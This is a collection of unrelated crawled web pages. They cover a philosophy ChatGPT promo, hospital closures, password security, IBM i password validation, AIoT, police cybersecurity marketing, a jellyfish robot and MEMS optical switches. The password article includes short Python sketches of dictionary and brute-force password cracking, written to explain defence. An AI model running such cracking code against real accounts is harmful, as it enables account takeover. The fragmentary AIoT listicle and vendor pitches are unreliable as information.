You are an expert in philosophy who explains philosophy for specialists, rather than in a popularising way.
Introduction to 哲学分析师
哲学分析师, or 'Philosophy Analyst', is a customized version of ChatGPT, designed to provide in-depth analysis and understanding across philosophy, sociology, and psychology. Its main function is to bridge the gaps between these disciplines, offering comprehensive insights and connections that enhance the user's knowledge and critical thinking skills. 哲学分析师 caters to those seeking a deeper understanding of complex concepts, emphasizing clarity, accuracy, and a multidisciplinary perspective. For instance, it can analyze philosophical texts, compare sociological theories, and explain psychological phenomena, all while highlighting their interrelations.
Main Functions of 哲学分析师
Analyzing the ethical implications of artificial intelligence.
A user wants to understand the ethical considerations of AI in healthcare. 哲学分析师 provides an analysis drawing from deontological and utilitarian perspectives, highlighting potential conflicts and resolutions.
Sociological Theory Application
Explaining the concept of social stratification.
A student is writing a paper on social inequality. 哲学分析师 explains social stratification using theories from Karl Marx, Max Weber, and Pierre Bourdieu, providing examples of how these theories apply to modern society.
Psychological Concept Clarification
Describing cognitive dissonance.
A user is curious about why they feel uncomfortable after making a decision that contradicts their beliefs. 哲学分析师 explains cognitive dissonance, using real-life examples to illustrate how people resolve such discomfort.
Ideal Users of 哲学分析师
Students and Academics
Students and academics in the fields of philosophy, sociology, and psychology benefit greatly from 哲学分析师. It aids in research, offers clear explanations of complex theories, and provides multidisciplinary perspectives that enrich their studies and academic work.
Lifelong Learners and Enthusiasts
Individuals with a keen interest in understanding human behavior, social structures, and philosophical thought find 哲学分析师 a valuable resource. It helps them explore and connect ideas across disciplines, fostering a deeper appreciation and comprehension of the world around them.
How to Use 哲学分析师
Visit aichatonline.org for a free trial without login, no need for ChatGPT Plus.
Familiarize yourself with the platform’s interface, ensuring you know where to input queries and access tools like Python, browser, and DALL-E.
Prepare your queries by clearly defining your topics of interest in philosophy, sociology, or psychology for in-depth analysis.
Use 哲学分析师 to explore complex topics, asking specific questions and requesting multidisciplinary perspectives for comprehensive insights.
Review the responses provided, utilize the additional academic references suggested, and apply the insights to your academic or personal projects.
Try other advanced and practical GPTs
AI-Powered Expertise for Japanese Tax Laws
画图梦想家 🌟 (high-definition, imaginative drawing)
AI-powered detailed and imaginative image creation tool
AI-powered translation and writing assistance.
AI-powered tool for accounting solutions
AI-powered insights for films and TV.
AI-powered image creation tool
AI-powered custom LINE stickers
AI-powered math adventures for all students
AI-powered language translation made easy.
AI-Powered Customer Communication Solution
Create stunning AI-generated images effortlessly.
AI-powered Japanese OCR tool
- Academic Writing
- Exam Preparation
- Professional Research
- Theory Exploration
- Multidisciplinary Analysis
Detailed Q&A about 哲学分析师
What is 哲学分析师?
哲学分析师 is an AI-powered tool designed to provide deep insights and comprehensive analysis in the fields of philosophy, sociology, and psychology. It offers multidisciplinary perspectives, making complex topics accessible and comprehensible.
How can 哲学分析师 help in academic writing?
哲学分析师 can assist in academic writing by offering detailed explanations, comparisons, and connections among ideas from philosophy, sociology, and psychology. It provides high-quality academic references and helps in structuring arguments with well-rounded perspectives.
Can 哲学分析师 be used for professional research?
Yes, 哲学分析师 is an invaluable resource for professional research, offering in-depth insights, objective analyses, and extensive academic references in philosophy, sociology, and psychology, aiding researchers in developing well-informed and comprehensive studies.
What are some common use cases for 哲学分析师?
Common use cases include exploring philosophical theories, understanding sociological phenomena, analyzing psychological concepts, preparing for academic exams, writing research papers, and gaining multidisciplinary perspectives on complex topics.
Is prior knowledge required to use 哲学分析师 effectively?
While prior knowledge in philosophy, sociology, or psychology can be helpful, it is not required. 哲学分析师 is designed to cater to both beginners and advanced users, providing clear and comprehensive insights regardless of the user’s background. | <urn:uuid:c21fe007-d11d-4858-9a10-5662e1d1a67e> | CC-MAIN-2024-38 | https://theee.ai/tools/%E5%93%B2%E5%AD%A6%E5%88%86%E6%9E%90%E5%B8%88-2OToA6rY50 | 2024-09-20T04:51:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00677.warc.gz | en | 0.798277 | 1,481 | 2.578125 | 3 |
The article written by Soroush Saghafian delves into the complex issue of hospital closures in the United States, analyzing the key factors contributing to these closures, the adaptations by healthcare providers, and the resulting public impacts. This comprehensive study highlights the urgent need for informed policies to mitigate the negative consequences of hospital closures, particularly in light of the exacerbating effects of the COVID-19 pandemic.
Main Drivers of Hospital Closures
Financial Instability
One of the principal drivers of hospital closures is financial instability. Hospitals often operate on narrow margins and struggle with reduced reimbursement rates from government payers such as Medicare and Medicaid, uncompensated care for uninsured patients, and rising operational costs. These challenges are intensified for rural hospitals due to smaller patient populations and difficulties in retaining physicians.
Healthcare Policy Changes
Healthcare policies at both state and federal levels significantly impact hospital revenues and operations. Changes in Medicare reimbursement rates and Medicaid expansion decisions can drastically alter the number of insured patients and the financial stability of healthcare facilities. Funding mechanisms like the Disproportionate Share Hospital (DSH) payment and the Critical Access Hospital (CAH) program have been altered over time, affecting hospitals’ ability to manage financial challenges.
Industry Consolidation and Vertical Integration
The rapid consolidation within the healthcare industry, where larger hospital systems acquire smaller, independent hospitals or physician practices, leads to the closure of facilities deemed redundant or uncompetitive. This trend has resulted in fewer operational small hospitals and higher market dominance by large healthcare systems.
Demographic Shifts
Changes in population demographics, such as aging populations, alter the demand for specific healthcare services. Rural hospitals are particularly vulnerable as the physician workforce ages and patient mobility changes, especially during events like the COVID-19 lockdowns.
Patient Bypass Behavior
Patients’ tendency to bypass local hospitals in favor of larger, perceived higher-quality institutions reduces local hospitals’ demand, financially straining these facilities and increasing the risk of closure.
Technological Advancements
Technological advances like telemedicine and mobile health (mHealth) technologies reduce the need for in-person hospital visits, thereby decreasing demand for hospital services and impacting revenues. This shift has forced some hospitals to reevaluate their service offerings and operational models.
Adaptations by Nearby Hospitals
Upon a hospital’s closure, nearby hospitals must manage the sudden surge in patient demand. Research suggests that these hospitals typically enhance their operational efficiency by speeding up service delivery instead of expanding capacity, which can negatively impact care quality. For example, the increased throughput may lead to shorter service durations but can result in higher 30-day mortality rates and other care quality degradation.
Adaptations by Physicians
Physicians affected by hospital closures face numerous challenges in continuing their careers. Some explore alternative practice models like telemedicine, relocate, open new practices, or even retire. How easily physicians adapt depends on their specialty, professional network, and financial resources. Hospitalists, emergency medicine physicians, anesthesiologists, and OB/GYNs often face the greatest challenges, given their reliance on hospital-based settings.
Public and Policy Impacts
Hospital closures have far-reaching effects beyond immediate patient access issues, impacting providers and the broader healthcare system. The spillover effects, such as quality of care decline in nearby hospitals and regional mismatches in physician supply and demand, underscore the need for comprehensive policy interventions. Effective policy measures might include financial support mechanisms for at-risk hospitals, monitoring service quality post-closure, and promoting telehealth and other innovative care delivery models in underserved areas.
The article authored by Soroush Saghafian delves deeply into the intricate issue of hospital closures across the United States. It examines the key factors driving these closures, such as financial strain, changes in patient demographics, and evolving healthcare policies. Additionally, the study explores how healthcare providers are adapting to these closures through various means, such as consolidation and telemedicine, and assesses the consequent impacts on public health. Saghafian’s analysis underscores the urgent requirement for well-informed policies aimed at alleviating the negative repercussions of hospital closures. These consequences can be particularly severe in rural areas where access to medical care is already limited. The COVID-19 pandemic has further intensified the situation, highlighting the vulnerabilities in the healthcare system and amplifying the need for swift, effective action. This comprehensive review calls for policymakers to take immediate steps to address these issues, ensuring that communities do not suffer due to a lack of local medical facilities. | <urn:uuid:d095ec85-d78a-4ede-998b-685fad99e4c4> | CC-MAIN-2024-38 | https://healthcarecurated.com/management-and-administration/how-do-hospital-closures-affect-healthcare-policy-and-public-health/ | 2024-09-09T05:24:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00777.warc.gz | en | 0.937082 | 902 | 2.671875 | 3 |
The correct handling of passwords is very important, as attacks such as phishing or identity theft are increasingly successful. On the 1st Thursday in May, World Password Day, we will show you what you need to consider when dealing with passwords and why the password could soon be abolished!
Secure password – How do I create it?
There are several approaches to guessing a password. Three classic methods are as follows:
- the dictionary attack
- the creation of a personalized password list
- the brute force method
As users, we should choose a password that can withstand all three attacks. On World Password Day, we'll show you how to do that – and why it's time to slowly part with this relic.
Language known? Then a dictionary attack can be successful!
In a dictionary attack, the attacker uses the entire dictionary and tries each word as a password. Once the complete dictionary has been tried out, the dictionary can be supplemented or modified with numbers or variants.
Attackers thus increase the probability of finding what they are looking for in the next run. Passwords like Martin0815, 0688Abschleppsein, or Donaudampfschifffahrtskapitän3 can be guessed quickly this way. As users, we should choose a password that does not appear in any dictionary.
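At its core, a dictionary attack is nothing more than a loop over a word list, often extended with common mutations. The following Python sketch is purely illustrative; the word list, hash function, and stolen hash are hypothetical stand-ins:

```python
import hashlib

def dictionary_attack(target_hash, wordlist):
    """Try every word in the list, plus simple variants, against a stolen hash."""
    for word in wordlist:
        bases = [word, word.capitalize()]
        # Extend the dictionary with appended digits, as described above.
        candidates = bases + [b + str(n) for b in bases for n in range(100)]
        for candidate in candidates:
            if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
                return candidate  # password found
    return None  # dictionary exhausted without a match

# Hypothetical example: a tiny word list instead of a full dictionary.
stolen = hashlib.sha256(b"Martin8").hexdigest()
print(dictionary_attack(stolen, ["anna", "martin", "passwort"]))  # -> Martin8
```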
Dog, cat, mouse – the personalized password list
In this attack, the attacker creates his own password list for a specific victim. Unlike a dictionary attack, the attacker does not use a general list, but adapts a list of information that the victim has disclosed about himself. Popular information is, for example, the names of children, pets, or favorite teams.
The source for this is often professional and private social networks. As users, we should not include any personal references in our passwords; otherwise, an attacker could hit upon our password after thorough research.
With brute force – the brute force method
This simple attack consists of trying out all possible combinations. It follows no particular system; an obvious starting point is to begin with the alphabet or with 0 and work through the combinations one by one. Tried online, this procedure is extremely time-consuming. Offline password attacks, e.g. on encrypted documents, can succeed quickly with this approach, since many millions of passwords can sometimes be tried per second.
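A minimal sketch of the brute-force idea in Python: enumerate every combination of a character set, shortest first. The printed search-space sizes make the time argument concrete, since each additional character multiplies the number of candidates by the size of the alphabet:

```python
import itertools
import string

ALPHABET = string.ascii_lowercase + string.digits  # 36 characters, for illustration

def brute_force(check, max_length=4):
    """Try every combination up to max_length; 'check' is a hypothetical test oracle."""
    for length in range(1, max_length + 1):
        for combo in itertools.product(ALPHABET, repeat=length):
            candidate = "".join(combo)
            if check(candidate):
                return candidate
    return None

print(brute_force(lambda pw: pw == "ab1"))  # finds a short password quickly

# Search-space growth: 36^n candidates for length n.
for n in (4, 8, 12):
    print(f"length {n:2d}: {len(ALPHABET) ** n:,} candidates")
```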
Stolen data? Then the most secure password does not help!
Another possibility is to search for data that has already been stolen. More than 7.5 billion records have been stolen to date, and the probability of being among the victims increases with every new data theft. If the data was stolen in plain text, even a 40-character password will not help at the end of the day.
Anyone can check whether their own data has already been stolen. The Identity Leak Checker from the Hasso-Plattner-Institute in Potsdam enables such a check. For this reason alone, different passwords should be used for different platforms.
Creation of a good, secure password!
So a good password:
- has enough characters to make a brute-force attack as tedious as possible,
- is not a word from the dictionary, and
- has no personal reference.
But how do you create such a password, and how do you remember it? To create a good password, take a sentence that you can easily remember and then alter it. For example, delete all letters except the last one in every word. If you also insert numbers and special characters and work with replacements, you get a password that can withstand all the attacks described above. The BSI has also published a guide for creating passwords.
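As a worked example of the sentence method, here is one possible set of rules in Python; which letter you keep and which substitutions you apply is a free choice and should remain your secret:

```python
def sentence_to_password(sentence):
    """Keep the last letter of every word, then apply digit/symbol replacements."""
    core = "".join(word[-1] for word in sentence.split())
    substitutions = {"e": "3", "a": "@", "s": "$", "o": "0"}  # example replacements
    return "".join(substitutions.get(c, c) for c in core)

print(sentence_to_password("My dog chases the neighbours cat every single morning"))
# -> yg$3$ty3g (memorable via the sentence, but not a dictionary word)
```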
To remember all the passwords you have created in this way, it is recommended to use a password manager. Free options include KeePassXC and KeePass. Such software can also generate secure passwords, but this requires trusting the software.
The ultimate security – does it even exist?
There will never be 100% security where passwords are concerned, because with luck an attacker can always obtain the password. As a user of various services, however, you are safer if you create passwords according to the rules above. Assigning and managing secret phrases remains quite a challenge. XignSys GmbH from Gelsenkirchen wants to solve this problem for society at large, and is well on its way to doing so.
Under the motto "World Password Day – the last of its kind," the company shows what possibilities the future holds and why the password has had its day!
By Rich Loeber
While the IBM i operating system has very good features for controlling password selection, sometimes your password policy just can't be enforced without additional checking. You may have a list of reserved words that you specifically do not want anyone using as a password. Or, you may have some very stringent requirements that are just not covered by the system values that control password assignment in IBM's i/OS.
When this happens, the only solution is to code your own password validation routine. This can be coded in any high level language. The operating system passes four parameters to your program, one of which is a single character return code. Once you've had a chance to complete your validation testing, just set the return code to the value you want and exit your program. If you set the return code to zero ('0'), then the operating system will assume that your password is acceptable and the password is updated. The parameters passed are, in order, the new password, the old password, the return code and the user profile for a total of 31 characters.
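An actual validation program on the IBM i would be written in an ILE language such as CL, RPG, or C; the Python sketch below only illustrates the kind of checks such a program might perform, following the parameter layout described above. The reserved-word list and the meaning of each nonzero return code are hypothetical:

```python
RESERVED_WORDS = {"PASSWORD", "WELCOME", "QSECOFR", "COMPANY1"}  # hypothetical list

def validate_password(new_pwd, old_pwd, user_profile):
    """Return '0' to accept the new password, or a nonzero code naming the failure."""
    new_pwd = new_pwd.strip().upper()
    if new_pwd in RESERVED_WORDS:
        return "1"  # reserved word
    if user_profile.strip().upper() in new_pwd:
        return "2"  # contains the user profile name
    if new_pwd == old_pwd.strip().upper():
        return "3"  # same as the old password
    if not any(c.isdigit() for c in new_pwd):
        return "4"  # an extra rule beyond what the system values enforce
    return "0"  # acceptable; the operating system updates the password
```

Returning a distinct code for each failure, as here, is what gives your support team the heads-up described below.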
To tell the operating system that you now have your own password validation program in place, you need to update the system value "Password validation program" (QPWDVLDPGM). It is shipped from the factory set to *NONE. To use your own program, just change this value to your program name and library name. It is recommended that you store this program object in the QSYS library so that it is always saved when you backup your operating system.
Once your program is in place, test it to make sure that it is getting called. Use the CHGPWD command and intentionally use a password that will cause your routine to fail. You will see that a message is displayed indicating that the password rules are not met along with the value of the return code that you used. By varying the return code for different situations, you can give your support team a heads up as to the exact reason for the password failure. While you're completing your testing, make sure that you process a valid password change to make sure that normal changes are not adversely affected by your new validation routine.
Registering your specific program with the QPWDVLDPGM system value will only work if you are using default 10 character user profiles and passwords. If you are using the newer long passwords, then you will have to write an exit program and register it using the exit point registration facility. If you take this path, then the QPWDVLDPGM system value must get set to the special setting of *REGFAC and the exit program is registered by the WRKREGINF command. Beware, however, that the parameters for the exit point are very different. There is a good example of the format needed for this exit program in the IBM security guide.
One thing to watch out for in this process is that the passwords, both old and new, are passed to your program without any encryption. So, do not store any values received in a database file as this will compromise security on your system. In fact, you should periodically check this system value to make sure that it does not change and that the program processing additional validation rules remains unchanged. This could easily be abused on your system, so lock up the program object.
If you'd be interested in receiving a sample program for default 10 character password validation, I've written one just to test how this works on my system. Let me know and I'll send the program shell to you. If you have any questions about this topic you can reach me at rich at kisco.com, I'll try to answer any questions you may have. All email messages will be answered. | <urn:uuid:a744d0d6-69bb-4d48-9678-4446de5c7077> | CC-MAIN-2024-38 | https://www.kisco.com/ibm-i-security-tips/custom-password-validation-program-2.html | 2024-09-11T15:55:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00577.warc.gz | en | 0.937918 | 751 | 2.6875 | 3 |
Artificial Intelligence of Things: The Future of IoT Operations
Many organizations are incorporating AI into their business operations, and the results have been overwhelmingly positive.
The Artificial Intelligence of Things is taking this concept to the next level by embedding intelligence into physical objects and devices.
Artificial Intelligence of Things requires deep insight into both IoT technologies and the organization’s business processes.
Artificial Intelligence of Things requires a basic level of expertise in both programming and domain knowledge.
The artificial intelligence of things is about linking intelligent machines with other machines in order to share knowledge and learn from each other.
Artificial Intelligence drawing
One of the most powerful AI applications is computer vision which is being used to scan images and identify objects.
Jarvis Artificial Intelligence
Jarvis AI is an artificial intelligence (AI) system for managing the IoT.
The Olive AI platform is a suite of machine learning modules that allows you to create your own apps to automate the world around you.
AI Suite 3 is a new application that offers a single dashboard for all of your AI needs. With this new app, you can choose from a selection of predefined planners and agents to suit the task at hand.
As cybersecurity becomes increasingly vital to the way we manage our computer systems, it’s important to look across our social systems and make sure that every facet is secured.
Police forces are one such social system, containing a particularly large amount of sensitive data and assets. It is crucial to understand not only why the police can be a target for cybersecurity threats but what they can do to mitigate those threats.
Why police forces are a target for cybersecurity breaches
First, let’s look at why cybercriminals might want to target police forces. Because, as unfortunate as it is, these groups can be a surprisingly common target on the lists of attackers. In fact, in 2021 alone, 26 US Government agencies were targeted by ransomware attacks.
Abundant data to be stolen or compromised
One of the main reasons that the police are a target for cybersecurity threats is that they store and accrue a huge amount of data. That data is crucial to the operations of the justice system, keeping track of evidence, criminal databases, reports, and much more.
This means that a successful attack can lead to this data being stolen or compromised. From there, it can be used in leaks, held for ransom, sold to the highest bidder, or worse. Leaked data can have implications for criminal justice proceedings, interfering with trials, subpoenas, and indictments, directly impacting the lives of real people.
Additionally, a significant portion of the cyberattacks levied against police systems are carried out for cyberespionage purposes. If this data reaches the wrong hands it can pose a national security risk.
Sensitive data is at the core of why police forces need to invest in cybersecurity, though it’s far from the only threat facing the police.
Many departments are using outdated technology
Another major concern that makes the police a target for cybercrime activity is that many departments are using outdated technology. A survey of police officers in the UK revealed that only half of officers felt they could trust the data on their systems and 35% did not have access to a computer at work.
This can be the result of limited budgets and/or resources being spent in other areas.
However it happens, many police forces are using old software and hardware that is more vulnerable to a cyberattack. And for many, updating isn’t always an option that can be taken right away.
As such, investing in cybersecurity is key. Cybersecurity systems can help take the place of upgrading old technology, providing security even while the tech itself might be less than secure.
Cloud-based solutions, such as Logpoint’s SIEM integrations, could be a good route to explore for police forces. The ease of deployment, maintenance, and update support allows for a quick, cost-effective cybersecurity system to be implemented where it is needed most.
However, there is always a risk when highly sensitive data is stored in the cloud that it might be vulnerable to attack. It may be more prudent for police forces to keep such data on-premises to ensure it can be closely monitored, in which case an on-premises solution would be more appropriate.
Critical services and systems are at risk
Cybercriminals can use cybersecurity attacks as a way to disable critical services and systems. This can be a byproduct of a cyberattack or the primary goal.
Either way, it’s often easier than you may suspect to take critical services and systems offline. Once that happens, a variety of serious consequences can ensue. For example, if police dispatch centers are hacked, it can prevent people from making calls to the emergency services and getting the urgent help they need.
Criminals can use this as a way to extort money from police departments, commit crimes while systems are down, and otherwise exploit the situation for personal gain. This is one of the most serious consequences of poor cybersecurity and is something that should be addressed as a matter of urgency.
How Logpoint secures data for police force environments
Fortunately, police departments aren’t left defenseless. There are services available, like those offered by Logpoint, that can help police forces protect themselves against the growing threat of cybersecurity risks.
Combine all of your security intel into a single platform
Logpoint can help police departments around the world secure their data, systems, and assets by combining all of your security intel and services into a single platform.
It’s not uncommon to find departments using a variety of services in a mix-and-match workflow. While this can be effective at mitigating threats, it slows down response times, can become confusing, and often winds up being more trouble than it’s worth.
Logpoint resolves this by merging all of your intel into a single point of access.
Provides PII access monitoring
Logpoint provides Personal Identifiable Information (PII) access monitoring. That means that Logpoint can be used to secure access to sensitive, identifying data.
This is the kind of data that police departments typically have stored in abundance, and it’s also the kind of data that cyber criminals actively seek out. Logpoint can help you secure this data with ease.
Covers the discrepancies between business-critical systems
Logpoint also provides services that can cover the discrepancies between business-critical systems. This can help departments spot internal threats and errors, catch access violations early, and more.
EAL 3+ Certified
Logpoint were the first European provider of SIEM solutions to be granted EAL 3+ certification. This certification means that our software has been examined, verified, and documented to the Common Criteria standard and is authorized for deployment in industries and sectors with extremely high security standards such as defence, police, and intelligence.
For more information on how Logpoint can help boost the cybersecurity of your police force, reach out to our team of experts today. | <urn:uuid:d5ce5aaa-365d-4fe8-bc21-d79b228bcf3e> | CC-MAIN-2024-38 | https://www.logpoint.com/en/blog/securing-police-force-data/ | 2024-09-14T05:27:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00377.warc.gz | en | 0.957025 | 1,199 | 2.734375 | 3 |
Jellyfish Robot Designed for Underwater Missions
The team used shape memory alloys and polyamide to create a flexible, swimming robot
A jellyfish-inspired robot has been created to complete underwater missions, capable of monitoring marine life and underwater infrastructure.
The soft robot was created by a team from the Indian Institute of Technology Indore and the Indian Institute of Technology Jodhpur, using polyamide and shape memory alloys (SMAs).
SMAs are chosen for their deformable properties, capable of changing shape and returning to their original form in response to heat. In this instance, the material allows the robot to mimic the flowing movement of a jellyfish to allow its gentle movement through water.
The flexible, light robot weighs only 1.5 ounces and uses affordable materials, making it easily scalable and accessible to produce.
“The proposed structure is novel, cost-effective, and easy to fabricate with very less time consumption compared to conventional mold-based methods,” the team wrote in the paper. “The results show that the proposed method can be successfully applied to mimic jellyfish locomotion and extended to underwater applications.”
The robot prototype is also fitted with an onboard camera module and sonar sensor for object detection.
In initial tests, the robot prototype showed promising results, swimming horizontally at 0.3 inches per second.
"The behavior of the proposed jellyfish structure has been investigated with varying SMA wire diameters and frequencies," the team said. "The jellyfish tentacle displacement and velocity during mimicking were measured… In addition, a preliminary simulation of the jellyfish mimicking has been carried out in Ansys Fluent and the thrust force has been evaluated."
According to the team, the new robot could be further developed for more specific applications for underwater use cases and accelerate it into commercialization.
There are two basic design approaches to MEMS optical switches; each has its advantages and drawbacks.
Marc Fernandez and E. Kruglic
Optical Micro Machines Inc.
The holy grail of the all-optical crossconnect is finally within reach. This year, micro-electromechanical systems (MEMS) technology leaped from the laboratory to the field in optical-switching applications. We've seen demonstrations of MEMS-based optical switches routing live data traffic. The promise of thousands of photonic data-channel ports switched-all optically transparent to wavelength, data-rate, and signal format-is imminent.
MEMS is a relatively new technology that builds complex machines so small that these systems are measured in microns. Although not widely publicized, MEMS technology has been deployed for over a decade in multiple applications such as airbag sensors (accelerometers), pressure sensors, displays, adaptive optics, scanners, printers, data storage, and micro-fluidics. Some of these micro-machines have gears smaller than motes of dust. Although many MEMS structures look familiar when viewed under a microscope, their function is governed by forces that do not affect traditional machines. Micro-machines are more subject to atomic forces and surface science than to gravity or inertia.

MEMS devices typically combine electronic circuitry with mechanical structures to perform specific tasks. For optical switches, the key mechanical components are MEMS-based micro-machined mirrors fabricated on silicon chips using well-established, very-large-scale integration (VLSI) complementary metal-oxide semiconductor (CMOS) foundry processes.
Commercial MEMS-based all-optical switches are based on one fundamental principle and two well-understood approaches. The principle is simple: The switch routes photons from one fiber-optic cable to another. The routing is accomplished by steering the light through a collimating lens, reflecting it off a movable mirror, and redirecting the light back into one of N possible output ports.

The two basic design approaches for translating this principle into optical switches are a two-dimensional (2-D) or digital approach (N² architecture) and a three-dimensional (3-D) or analog approach (2N architecture). Each approach has advantages and disadvantages, but the combination of both in distinct but complementary product lines provides a comprehensive range of optical-switching solutions.
The 2-D digital approach is so-called because the micro-mirrors and fibers are arranged in a planar fashion, and the mirrors can only be in either of two known positions (on or off) at any given time. In this approach, an array of MEMS micro-mirrors is used to connect N input fibers to N output fibers. This is called an N² architecture, because it uses N² individual mirrors. For example, an 8x8 2-D switch uses 64 mirrors (see Figure 1). A big advantage of this approach is that it requires only simple controls, essentially consisting of very simple, transistor-transistor-logic (TTL) drivers and associated electronic upconverters to provide the required voltage levels at each MEMS micro-mirror.

Apart from a robust product line of NxN switches, including 4x4, 8x8, 16x16, and 32x32 ports, which use an input and an output fiber port, the 2-D planar approach supports the introduction of a third and fourth fiber port to a basic NxN switch (see Figure 2). That permits dynamic add/drop functionality, arrays of 1xN switches in a single package, and customized mirror configurations on the chip. These features allow an array of mirrors to replace yesterday's cumbersome, expensive, custom discrete switch integrations (see Figure 3) with small, hermetically packaged, robust, custom switching configurations (see Figure 4).
Although the simple 2-D design is inherently flexible, the greatest challenge in this approach lies in scaling switching to very high port counts. As port counts double, the distance the light must travel through free space squares. As the pitch of the micro-mirrors increases, the light-propagation distance increases and the diameter of the light beam grows, placing tight constraints on collimator performance and mirror-alignment tolerance. Such a tradeoff can rapidly become unmanageable, leading to very large silicon devices and low yields. Because of the length of the travel path for the signal, as well as the angle tolerance and angle uniformity required on the MEMS mirror itself, 32 ports are currently considered a top-end size for a single-chip solution in 2-D technology.
This is not to say that a 2-D approach is limited to 32 ports. On the contrary, there are exciting architectures, including the well-known Clos approach, that cascade smaller 2-D switches into a multistage architecture scalable to hundreds by hundreds of ports. An example is Siemens's Transexpress MODIF optical service node.

In a 2-D approach, insertion loss is primarily attributable to three distinct factors: the coupling loss of the collimating lenses, loss due to Gaussian beam propagation, and loss introduced by mirror angle divergence from 90 degrees. Additional factors are mirror angle uniformity across the array and travel distance variations along non-uniform path lengths. Despite these factors, Optical Micro Machines (OMM) demonstrated insertion losses averaging <5 dB for its 16x16 switch systems.
Another benefit of the 2-D approach is the ability to move rapidly from development to high-volume manufacturing, while maintaining the optical performance of a hand-built component, coupled with the reliability and cost-effectiveness of a mass-produced product.
In many respects, the 3-D analog or beam-steering approach is actually very similar to the 2-D approach. It uses the same principle of moving a mirror to redirect light. The 3-D approach results in a 2N architecture, because two arrays of N mirrors each are used to connect N input to N output fibers (see Figure 5). But in this approach, each mirror has multiple possible positions-at least N positions (see Figure 6). This approach is much less constrained by the scaling distance of light propagation as the port count grows. Such architectures can scale to thousands by thousands of ports with low loss (potentially 6 dB or less) and high uniformity.
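The difference in mirror counts between the two architectures is easy to quantify; this small calculation shows why the 2N design scales to high port counts while the N² design does not:

```python
for ports in (8, 16, 32, 256, 1024):
    n_squared = ports ** 2  # 2-D digital approach: one mirror per input/output pair
    two_n = 2 * ports       # 3-D analog approach: two arrays of N mirrors each
    print(f"{ports:>4} ports: N^2 = {n_squared:>9,} mirrors, 2N = {two_n:>5,} mirrors")
```

At 32 ports the counts are 1,024 versus 64 mirrors; at 1,024 ports they are more than a million versus 2,048.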
These advantages come at a price, however. Because the micro-mirror must have multiple possible positions, a sophisticated analog-driving scheme is implemented to ensure that the mirrors are in the correct positions at all times. Although MEMS technology can produce 2N 3-D mirror arrays with impressive stability and repeatability by using a simple open-loop driving scheme, closing the loop with active feedback controls is fundamental to achieving the long-term stability required in carrier-class deployment of an all-optical crossconnect. Using a closed-loop control scheme implies that monitoring the beam positions must be implemented in conjunction with computation resources for the active feedback loop and very-linear high-voltage drivers.
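Purely as an illustration of the closed-loop idea (not of any particular vendor's controller), the toy loop below repeatedly compares a measured mirror angle against its target and applies a proportional correction to the drive signal; the first-order actuator response is an assumed stand-in for the real electromechanics:

```python
def run_feedback(target_angle, gain=0.4, steps=200, tol=1e-5):
    """Toy proportional feedback loop for one micro-mirror axis."""
    angle = 0.0  # measured angle, e.g., from a beam-position monitor
    drive = 0.0  # commanded actuator drive
    for step in range(steps):
        error = target_angle - angle
        if abs(error) < tol:
            return drive, angle, step
        drive += gain * error            # proportional correction
        angle += 0.5 * (drive - angle)   # assumed first-order mirror response
    return drive, angle, steps

print(run_feedback(1.25))  # converges on the target angle in a few dozen steps
```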
Of the many possible methods of actuating a MEMS optical switch, two have emerged as possible solutions for commercial optical products: electrostatic and magnetic.
The electrostatic method relies on the attraction of oppositely charged mechanical elements. It is one of the main actuation methods used for all types of MEMS devices. Its many advantages include repeatability, ease of shielding, and well-understood behavior.Magnetic actuation relies on attraction between magnets and typically one or more electromagnets. While magnetic actuation can generate larger forces with high linearity, the MEMS community generally has not taken to its use because of the complications of integrating the magnets and the near impossibility of shielding neighboring devices from actuator crosstalk. The shielding problem is particularly difficult in non-laboratory situations where, for example, someone might be running a large electric motor nearby, thus generating huge and repeated magnetic disturbances. Additionally, magnetic actuators on the MEMS scale have yet to prove reliable. Many developers are also concerned with hysteresis, both in the magnetic domain and in the structural properties of the magnetic materials.
The only way to ensure reliability is through long-term testing and field use. So far, electrostatic is the only mass-produced and fielded MEMS actuation method. For many years, a large amount of effort went into solving the problems of electrostatic behavior, and many products using electrostatic actuation have reached the market in demanding fields. A prime example is Analog Devices' electrostatic MEMS device found in most modern airbag systems. Modern electrostatic MEMS devices often have positioning accuracy measured in fractions of an angstrom (somewhat smaller than a single hydrogen atom), with reliability greater than that of the electronics supporting them.

However, not everyone employs electrostatics due to its relatively low force potential. An appropriate structure combined with the right process is necessary to design structures that work well in this regime. If the structure is too stiff, for example, greater force may be needed, dictating the use of magnetic actuation. The MEMS designer makes tradeoffs, choosing either to accept the weaker forces of electrostatics or to fortify the system shielding and packaging and tackle the long-term reliability issues associated with magnetics. Because many open-ended questions remain in the use of magnetics, the electrostatic actuation method remains the optimum choice today for reliable devices required in high volumes.
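To get a feel for what "relatively low force potential" means, the standard parallel-plate approximation F = ε₀AV²/(2d²) can be evaluated with plausible (assumed, not vendor-specific) MEMS dimensions:

```python
EPSILON_0 = 8.854e-12  # vacuum permittivity, F/m

def parallel_plate_force(area_m2, voltage, gap_m):
    """Electrostatic attraction between parallel plates: F = eps0*A*V^2 / (2*d^2)."""
    return EPSILON_0 * area_m2 * voltage ** 2 / (2 * gap_m ** 2)

# Assumed example: a 100 um x 100 um electrode, 2 um gap, 50 V drive.
force = parallel_plate_force(area_m2=(100e-6) ** 2, voltage=50.0, gap_m=2e-6)
print(f"{force * 1e6:.1f} micronewtons")  # on the order of tens of uN
```

Forces in the micronewton range are ample for steering a featherweight mirror but far below what a magnetic actuator can deliver, which is exactly the tradeoff described above.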
Even when designers employ electrostatic actuation methods, optoelectronic packaging remains a considerable challenge. The traits that make MEMS so well matched with optical switching (most importantly, small size) can also present some of the biggest obstacles in making MEMS devices robust and manufacturable. With the compact scale of MEMS structures, a drop of water can seem like a typhoon and a speck of dust like a landslide. To keep these potentially destructive forces from causing harm, it is imperative to hermetically seal the MEMS chips. One solution is to integrate the electronics of a MEMS optical-switch subsystem with the optics and micro-mirrors in the same hermetically sealed ceramic packages (see Figure 7). This integration radically improves reliability and drastically simplifies manufacturability.

